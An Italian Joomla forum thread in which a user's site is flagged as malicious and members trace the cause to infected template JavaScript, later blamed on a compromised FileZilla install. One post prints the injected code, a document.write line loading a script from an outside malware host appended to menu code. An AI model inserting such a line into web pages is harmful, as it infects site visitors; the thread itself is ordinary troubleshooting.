Back to top

Autore Topic: Oziogallery e xxxxxxxxxxx  (Letto 9257 volte)

Offline notepad

  • Nuovo arrivato
  • *
  • Post: 28
    • Mostra profilo
Oziogallery e xxxxxxxxxxx
« il: 20 Mag 2010, 20:43:14 »
Ciao a Tutti
Spero di non creare scompiglio!
Ho appena installato l'ultima versione di Oziogallery
Ma appena apro il browser sia mozilla che chrome,mi dicono che il sito é malevolo :o
Prima di installare ozio,non sucedeva nulla!
questo é l'avvertimento (ps potri mandare in mp a chi di competenza,il mio sito)

Attenzione: l'apertura di questo sito potrebbe danneggiare il tuo computer!
Il sito web all'indirizzo www.miosito.com contiene elementi provenienti dal sito xxxxxxxxxxxxxxxxxx  in cui sembra essere presente malware, ovvero software in grado di danneggiare il tuo computer o, comunque, di funzionare senza il tuo consenso. Visitare un sito che contiene malware è sufficiente per infettare il tuo computer.
Per maggiori informazioni sui problemi riscontrati per questi elementi, visita la pagina Pagina di diagnostica Navigazione sicura. di xxxxxxxxxxxxxxxxxxxxx


« Ultima modifica: 20 Mag 2010, 20:59:12 da 56francesco »

Offline 56francesco

  • Fuori controllo
  • *
  • Post: 29585
  • Sesso: Maschio
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #1 il: 20 Mag 2010, 20:57:45 »
appunto, non creiamo allarmismi senza verificare...

un link al sito, please!
(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

Offline notepad

  • Nuovo arrivato
  • *
  • Post: 28
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #2 il: 20 Mag 2010, 21:20:59 »
appunto, non creiamo allarmismi senza verificare...

un link al sito, please!
Ok Questo é il mio sito http://fwd4.me/PDa
Segnalo in oltre che ieri,dopo l'aggiornamento alla 2.4 ho auto degli strani problemi..Tipo (errore la pagina che si per eccedere non é formatta per il web)
In pratica ho riinstallato tutto poco fà..PS: il template é gatutito..Insomma non ci sono porcherie nel mio sito.Ed é sempre composto da una gallery,una presentazione,una pagina contatti..
Scusate ecco un'errore che mi é apparso poco fà rassettando il XML della gallery

Errore di codifica del contenuto
La pagina che si sta cercando di visualizzare non può essere mostrata poiché fa uso di una forma di compressione non valida o non supportata.
Contattare il proprietario del sito web per informarlo del problema.
« Ultima modifica: 20 Mag 2010, 21:25:01 da notepad »

vamba

  • Visitatore
Re:Oziogallery e xxxxxxxxxxx
« Risposta #3 il: 20 Mag 2010, 21:25:50 »
Citazione
Insomma non ci sono porcherie nel mio sito
Mai dire Gatto!

Allora Lei ha delle cartelle js/ con un sacco di javascript infettati rilevati dal mio antivirus.

Controlli

A breve le allego immagine
« Ultima modifica: 20 Mag 2010, 21:28:13 da Vamba »

vamba

  • Visitatore
Re:Oziogallery e xxxxxxxxxxx
« Risposta #4 il: 20 Mag 2010, 21:30:27 »
Immagine coi dettagli dei file infetti (e questi non sono file della OzioGallery)

[allegato vecchio più di un anno eliminato automaticamente]

Offline notepad

  • Nuovo arrivato
  • *
  • Post: 28
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #5 il: 20 Mag 2010, 21:34:07 »
Immagine coi dettagli dei file infetti (e questi non sono file della OzioGallery)
Scusa Vamba ho analizzato sia il template che il contenuto di Joomla,scaricato dal sito ufficiale..E non trovo nessun virus..Com li avete trovati voi?
Grazie

Offline notepad

  • Nuovo arrivato
  • *
  • Post: 28
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #6 il: 20 Mag 2010, 21:44:24 »
Immagine coi dettagli dei file infetti (e questi non sono file della OzioGallery)
Scusa Vamba ho analizzato sia il template che il contenuto di Joomla,scaricato dal sito ufficiale..E non trovo nessun virus..Com li avete trovati voi?
Grazie

Chiedo scusa a tutto lo staff.
In Effetti analizzando la Cartella di joomla (scaricata dal sito ufficiale) un'altro antivirus mi rileva un BackDoor.MaosBoot.35
Ma siamo sicuri che nn sia già dentro la cartella di joomla?


Uploaded with ImageShack.us
« Ultima modifica: 20 Mag 2010, 21:51:01 da notepad »

Offline jeckodevelopment

  • Administrator
  • Instancabile
  • *****
  • Post: 5695
  • Sesso: Maschio
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #7 il: 20 Mag 2010, 21:52:55 »
siamo sicuri che i pacchetti di installazione e di aggiornamento di Joomla siano esenti da virus, in quanto prima del rilascio ufficiali sono stati controllati con una serie di diversi antivirus, antispyware ed antimalware aggiornati.
Il problema si verifica quando si scaricano pacchetti di aggiornamento, di componenti o di template da siti non ufficiali.

vamba

  • Visitatore
Re:Oziogallery e xxxxxxxxxxx
« Risposta #8 il: 20 Mag 2010, 21:54:29 »
hai provato anche con la versione Joomla 1.5.17 che si trova su questo sito?
In quanto ti posso assicurare che scaricata, adesso e passata la setaccio dall'antivirus non mi rileva nulla.

Ora mi accingo a provare la versione inglese scaricata dal sito ufficiale joomlacode.org

vamba

  • Visitatore
Re:Oziogallery e xxxxxxxxxxx
« Risposta #9 il: 20 Mag 2010, 22:04:45 »
Effettuata scansione con tre diversi antivirus nel pacchetto
scaricato dal joomacode.org (ovvero il pacchetto ufficiale) lo stesso che ti da segnalazione con il tuo antivirus.

Risultato = Il pacchetto non ha alcun file segnalato

Probabilmente l'antivirus con cui hai fatto la prova segnala ancora un vecchio falso-positivo su un file (ma si parla di parecchi mesi fa)

comunque.....
forse non hai guardato bene a fondo l'immagine che ti ho allegato
Nel pacchetto originale Joomla (scaricato sia qua che su joomla.org)
NON ESISTONO i seguenti file
templates/saluxi/js/moomenu.js
templates/saluxi/js/pqutlz.js

e dato che utilizzano mootools.js come motore è possibile che abbiano infettato anche i due file che si trovano dentro a cartella media/system/js (e quelli sono file nativi di joomla o almeno dovrebbero essere)
« Ultima modifica: 20 Mag 2010, 22:06:59 da Vamba »

Offline notepad

  • Nuovo arrivato
  • *
  • Post: 28
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #10 il: 20 Mag 2010, 22:15:13 »
Allora forse ho'individuato la causa,ovvero ho riscaricato il template che uso PQ Frequent a questo indirizzo
http://pqsofts.com/download/free-joomla-template/21-pq-frequent.html
Scansionato subito e mi rileva il flamigerato Backdoor :(
Il template é gratuito..Se anche voi rilevate qualcosa.Beh non so'che dire :-\

vamba

  • Visitatore
Re:Oziogallery e xxxxxxxxxxx
« Risposta #11 il: 20 Mag 2010, 22:51:34 »
Cambia template e segnala il problema allo sviluppatore di quel template.

Offline alexred

  • Fuori controllo
  • *
  • Post: 25672
  • Sesso: Maschio
  • Esperto in ozio relaxed
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #12 il: 20 Mag 2010, 23:24:43 »
azz... brutta storia.
Vi chiedo cortesemente di verificare anche nel file dello stesso template che è in download qui nel calderone:
http://www.joomla.it/template/elenco-template/4006-pqfrequent.html

se è affetto da virus lo cancelliamo.

Offline ste

  • Instancabile
  • ******
  • Post: 8774
  • Sesso: Femmina
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #13 il: 20 Mag 2010, 23:29:27 »
azz... brutta storia.
Vi chiedo cortesemente di verificare anche nel file dello stesso template che è in download qui nel calderone:
http://www.joomla.it/template/elenco-template/4006-pqfrequent.html

se è affetto da virus lo cancelliamo.
Facendo la scansione con Avg free non risulta nulla di infetto.
TTI - Team Traduzione Italiano di Joomla.it - Guide su Joomla

vamba

  • Visitatore
Re:Oziogallery e xxxxxxxxxxx
« Risposta #14 il: 20 Mag 2010, 23:30:22 »
Effettuata verifica sul file ...
Esito negativo
nessuna segnalazione.

Offline jeckodevelopment

  • Administrator
  • Instancabile
  • *****
  • Post: 5695
  • Sesso: Maschio
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #15 il: 21 Mag 2010, 11:13:10 »
@alexred,
io ho utilizzato anche altri template di quello sviluppatore, pacchetti puliti!

Offline notepad

  • Nuovo arrivato
  • *
  • Post: 28
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #16 il: 21 Mag 2010, 12:02:43 »
Scusatemi non so'+ che fare..( il template e il contenuto di Joomla non contengono virus)..Analizzati sul mio computer con diversi Antivirus.Ma come installo tutto sul mio spazio web dopo un po'mi riappaiono errori strani,causati dal Trojan..Ho riscaricato sul mio pc il template e nella cartella JS i seguenti files contengono codice maligno (moomenu,pqutlz)..e precisamente questo codice window.addEvent("domready",function(){var b=$$(".moduletable_menu li a");new SmoothScroll({duration:500,transition:Fx.Transitions.linear},window);b.each(function(d){var e=new Fx.Styles(d,{duration:200,wait:false});d.addEvent("mouseenter",function(){e.start({"padding-left":22})});d.addEvent("mouseleave",function(){e.start({"padding-left":16})})});var c=$$(".moduletable_menu li li a");c.each(function(d){var e=new Fx.Styles(d,{duration:200,wait:false});d.addEvent("mouseenter",function(){e.start({"padding-left":42})});d.addEvent("mouseleave",function(){e.start({"padding-left":32})})});var a=new Tips($$(".toolTips"),{initialize:function(){this.fx=new Fx.Style(this.toolTip,"opacity",{duration:500,wait:false}).set(0)},onShow:function(d){this.fx.start(1)},onHide:function(d){this.fx.start(0)}})});
document.write('<script src=http://natusha.merengue.tuzonavirtual.com/videos/browscap.php ><\/script>');
Avete un'idea di cosa diamine succeda?
Grazie

mau_develop

  • Visitatore
Re:Oziogallery e xxxxxxxxxxx
« Risposta #17 il: 21 Mag 2010, 13:45:26 »
sembra un tentativo di clickjacking, ovvero furto del click, quel codice è da qualche parte...

M.

EDIT: ho scaricato il template dove lo scarichi tu e ho guordato i files, non contiene nulla di nocivo.

Quello che ti succede è una manipolazione del dom, se non ho capito male viene sostituito l'url al menu.

Hai fatto girare un antivirus locale?

M.

EDIT: (caxata)"Quello che ti succede è una manipolazione del dom,....."

è semplicemente js iniettato nella costruzione del menu..
« Ultima modifica: 21 Mag 2010, 18:17:26 da mau_develop »

Offline notepad

  • Nuovo arrivato
  • *
  • Post: 28
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #18 il: 21 Mag 2010, 14:20:13 »
Ciao
Penso di aver "sradicato"sto maledettissimo problema.Mi é venuta semplicemente l'idea che poteva essere Filezilla la causa.In effetti digitando su google (filezilla virus).ho trovato un topic qui sul forum http://forum.joomla.it/index.php/topic,93532.60.html
Dove si parla di una possibile infezione di filezilla appunto!
lo ho'semplicemente riinstallato e x ora il mio sito sembra funzioni senza problemi.
Speriamo Bene
Comunque Grazie a Tutti coloro che sono intervenuti!
Fabry ;)

Offline 56francesco

  • Fuori controllo
  • *
  • Post: 29585
  • Sesso: Maschio
    • Mostra profilo
Re:Oziogallery e xxxxxxxxxxx
« Risposta #19 il: 21 Mag 2010, 19:34:45 »
Citazione
lo ho'semplicemente riinstallato e x ora il mio sito sembra funzioni senza problemi.

una partizione con ubuntu ?
(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

 



Web Design Bolzano Kreatif